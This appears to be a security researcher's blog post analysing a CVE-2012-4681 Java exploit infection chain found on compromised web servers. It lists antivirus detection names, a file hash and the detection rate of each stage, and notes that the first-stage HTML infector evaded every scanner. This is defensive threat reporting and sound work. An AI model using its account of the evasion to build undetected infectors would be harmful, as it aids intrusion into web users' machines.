ESET-NOD32 : Java/Exploit.CVE-2012-4681.Q
TrendMicro-HouseCall : TROJ_GEN.F47V0830
Avast : Java:CVE-2012-4681-G [Expl]
nProtect : Java.Exploit.CVE-2012-4681.D
GData : Java.Exploit.CVE-2012-4681.D
Kaspersky : HEUR:Exploit.Java.CVE-2012-4681.gen
BitDefender : Java.Exploit.CVE-2012-4681.D
Emsisoft : Java.Dong!IK
Ikarus : Java.Dong
Sophos : Exp/20124681-A
Well, those malwares can be detected already, BUT!!!! The main infector of this scheme, which is the file "notice.html", is not, and I don't think it can be detected in the future either:
MD5: 96084d59b5d5ec66a6de11a0502a6f0a
File size: 1.2 KB ( 1222 bytes )
File name: notice.html
File type: HTML
Detection ratio: 0 / 41 <====ZERO DETECTION!!
Analysis date: 2012-09-12 15:34:46 UTC ( 0 分 ago )
URL: ------>>[CLICK]
So the detection rates of this infection, starting from the infector, are as below:
notice.html -----> applet.jar ----> scvhost.exe ----> mdm.exe
  (0/42)            (15/42)           (25/42)          (35/42)
Let's summarize the moral of this story, which is:
1. See the dates of the sample findings; I detected these a few hours ago today. Who said that the CVE-2012-4681 infector attack is over? The code is improving a bit, the way I see it.
2. Gentlemen, DO NOT leave your web server unconfigured & unattended online. You'll get this mess injected into it..
3. AntiVirus products are aiming mostly at the payload malware rather than at its infectors, since base scanning (pattern matching) cannot detect all possible schemes of infector files w/o gaining False Positives.
It's time to think of another vector for scanning these infectors, a smarter one! And this is why I feel those malware retards are laughing at us now...